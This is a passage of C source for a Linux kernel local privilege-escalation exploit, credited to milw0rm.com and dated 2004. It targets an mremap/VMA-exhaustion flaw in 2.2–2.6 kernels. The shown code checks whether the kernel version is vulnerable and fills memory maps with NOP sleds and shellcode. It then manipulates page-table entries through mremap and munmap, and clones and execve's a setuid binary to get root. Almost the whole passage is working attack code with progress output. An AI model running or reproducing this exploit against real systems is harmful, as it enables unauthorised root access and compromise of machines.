" movl %%esp, %%ecx \n"
" movl $"xstr(__NR_clone)", %%eax \n"
" int $0x80 \n"
" movl %%eax, %0 \n"
" popa \n"
: : "m"(pid)
);
}
static inline void my_execve(void)
{
__asm__(
" movl %1, %%ebx \n"
" movl %2, %%ecx \n"
" movl %3, %%edx \n"
" movl $"xstr(__NR_execve)", %%eax \n"
" int $0x80 \n"
: "=a"(ret)
: "m"(suid), "m"(argv), "m"(env)
);
}
static inline void pte_populate(unsigned addr)
{
unsigned r;
char *ptr;
memset((void*)addr, 0x90, PAGE_SIZE);
r = ((unsigned)suid_code_end) - ((unsigned)suid_code);
ptr = (void*) (addr + PAGE_SIZE);
ptr -= r+1;
memcpy(ptr, suid_code, r);
memcpy((void*)addr, launch, strlen(launch)+1);
}
// hit VMA limit & populate PTEs
static void exhaust(void)
{
// mmap PTE donor
t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(MAP_FAILED==t)
goto failed;
// prepare shell code pages
for(i=2; i<LINKERPAGES+1; i++)
pte_populate(victim + PAGE_SIZE*i);
i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ);
if(i)
goto failed;
// lock unmap
base = MMAP_BASE;
cnt = 0;
prot = PROT_READ;
printf("\n"); fflush(stdout);
for(;;) {
t = mmap((void*)base, PAGE_SIZE, prot,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(MAP_FAILED==t) {
if(ENOMEM==errno)
break;
else
goto failed;
}
if( !(cnt%512) || cnt>65520 )
printf("\r MMAP #%d 0x%.8x - 0x%.8lx", cnt, base,
base+PAGE_SIZE); fflush(stdout);
base += PAGE_SIZE;
prot ^= PROT_EXEC;
cnt++;
}
// move PTEs & populate page table cache
ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE,
MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);
if(-1==ret)
goto failed;
munmap((void*)MMAP_BASE, old_esp-MMAP_BASE);
t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE,
PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0,
0);
if(MAP_FAILED==t)
goto failed;
*t = *((unsigned *)old_esp);
munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE));
printf("\n[+] Success\n\n"); fflush(stdout);
return;
failed:
printf("\n[-] Failed\n"); fflush(stdout);
_exit(0);
}
static inline void check_kver(void)
{
static struct utsname un;
int a=0, b=0, c=0, v=0, e=0, n;
uname(&un);
n=sscanf(un.release, "%d.%d.%d", &a, &b, &c);
if(n!=3 || a!=2) {
printf("\n[-] invalid kernel version string\n");
_exit(0);
}
if(b==2) {
if(c<=25)
v=1;
}
else if(b==3) {
if(c<=99)
v=1;
}
else if(b==4) {
if(c>18 && c<=24)
v=1, e=1;
else if(c>24)
v=0, e=0;
else
v=1, e=0;
}
else if(b==5 && c<=75)
v=1, e=1;
else if(b==6 && c<=2)
v=1, e=1;
printf("\n[+] kernel %s vulnerable: %s exploitable %s",
un.release, v? "YES" : "NO", e? "YES" : "NO" );
fflush(stdout);
if(v && e)
return;
_exit(0);
}
int main(int ac, char **av)
{
// prepare
check_kver();
memset(env, 0, sizeof(env));
memset(argv, 0, sizeof(argv));
if(ac>1) suid=av[1];
if(ac>2) launch=av[2];
argv[0] = suid;
get_esp();
// mmap & clone & execve
exhaust();
cloneme();
if(!pid) {
my_execve();
} else {
waitpid(pid, 0, 0);
}
return 0;
}
// milw0rm.com [2004-03-01]